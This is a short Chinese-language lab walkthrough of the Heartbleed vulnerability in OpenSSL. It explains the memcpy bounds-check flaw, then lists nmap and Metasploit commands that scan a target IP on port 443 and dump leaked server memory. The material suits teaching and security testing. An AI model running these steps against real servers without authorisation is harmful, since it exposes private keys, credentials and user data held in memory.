漏洞描述:
心脏出血是OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞,OpenSSL库中用到了该心跳协议。HeartBleed主要存在与OpenSSL的1.0.1版本到1.0.1f版本。利用该漏洞,攻击者可以远程读取服务器内存中64K的数据,获取内存中的敏感信息。
Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。
漏洞利用
nmap 扫描靶机 ip
nmap -Pn 123.56.82.231
使用nmap自带的ssl-heartbleed.nse脚本对靶机进行扫描看是否存在该漏洞
扫描 443端口 发现存漏洞
使用msfconsole 进行漏洞利用
用 search heartbleed 搜索漏洞利用模块
use 1
set RHOSTS ip
set RPORT 端口
set verbose true #(设置verbose,这个设置要设置成true才能看到泄露的信息)
exploit
我们可看到泄露的信息